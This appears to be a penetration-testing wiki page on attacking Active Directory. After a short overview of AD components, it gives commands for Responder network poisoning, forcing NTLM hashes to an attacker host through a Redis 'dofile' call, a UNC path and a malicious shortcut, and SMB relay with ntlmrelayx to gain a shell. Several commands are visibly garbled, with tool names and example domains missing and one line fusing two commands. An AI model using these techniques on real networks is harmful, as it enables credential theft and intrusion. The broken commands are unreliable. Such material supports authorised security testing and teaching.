Active Directory


Active Directory (AD) allows network administrators to control computers and services and the interaction between them and the user within the domain.

The data is stored in a hierarchical structure consisting of five main components: Objects, Organizational Units, domains, trees, and forests.

  • Object: An object is an essential element in AD that represents a user, a group, a computer, an application, a printer, or a shared folder.

  • Organizational Unit (OU): An Organizational Unit is an object that acts as a "directory" of objects. It can also contain other organizational units.

  • Domain: A domain represents a group of objects which share the same AD database (AD DB).

  • Tree: A tree is a collection of one or more domains in a contiguous namespace. For instance, "" and "" are considered in the same tree.

  • Forest: A forest is a collection of trees where the trees can trust each other and share directory schemes, application information and domain configuration.

Finally, Active Directory is a combination of services:

  • Domain Services: The primary function is to store data and manage communications between users and the DC.

  • Certificate Services: Creates, manages and shares encryption certificates for exchanging information securely over the internet.

  • Lightweight Directory Services: Supports LDAP for cross-platform domain services.

  • Active Directory Federation Services: Provides users with Single Sign-On (SSO) authentication to access multiple applications in the same session, so users do not have to provide the same credentials.

  • Rights Management: Controls information rights and data access policies. It also encrypts the content, such as documents or emails.


Since Active Directory is a set of services, a domain can contain services like SMTP, Web, and SMB that the attacker will have to exploit them to obtain some credentials or access the system. There are cheatsheets and mindmaps that the attacker can follow to gather information.

Nonetheless, a good starting point would be to gather information about the DNS, SMB, LDAP and Kerberos services.

Poison the network

With the use of the tool responder, an attacker can poison the network (LLMNR, NBT-NS, MDNS protocols) so that the victims will communicate with their machine. If the host belongs to a resource that requires identification, the user and their NTLMv2 hash will be sent to the attacker. After that, they can be cracked offline and then used to access the poisoned victims' machines.

sudo responder -I <NETWORK_INTERFACE> -Prdwv 

Triggering responder

If an attacker got RCE on a service that has an associated AD account or wants to perform social engineering, here there are some tips to obtain NTLM hashes with responder.


redis-cli -h <IP> -p <PORT> eval "dofile('//<ATTACKER_IP>//share')" 0


Through the CLI you can access the responder server in order to obtain the user's NTLM hash.

C:\Users\victim> \\<ATTACKER_IP>\

Windows shortcut

You can create windows shortcuts with to retrieve the NTLM hash once the victim clicks on it.

./ -l name -n shortcut -i \\\\<ATTACKER_IP>\\a -o out.lnk

SMB Relay Attack

An SMB Relay attack consists when an attacker captures a user's NTLM hash and relays it into another machine on the network to gain a remote shell or file access.

This attack only works if SMB Signing is disabled on the target, you can check it by executing the following command against the victim machine.

nmap --script=smb2-security-mode.nse -p445 -Pn <VICTIMS_IP>

If "Message signing enabled but not required" appears in the result, the machine is vulnerable.

Turn off SMB in the Responder configuration as NTLMRelayX will be handling SMB.

sudo sed -i 's/SMB = On/SMB = Off/' /etc/responder/Responder.conf -I eth0 -wdr -v

Then, you need to execute the impacket module ntlmrelayx to obtain an interactive shell, waiting for the responder to obtain an NTLM response.

ntlmrelayx -tf <TARGET> -smb2support -i


Last updated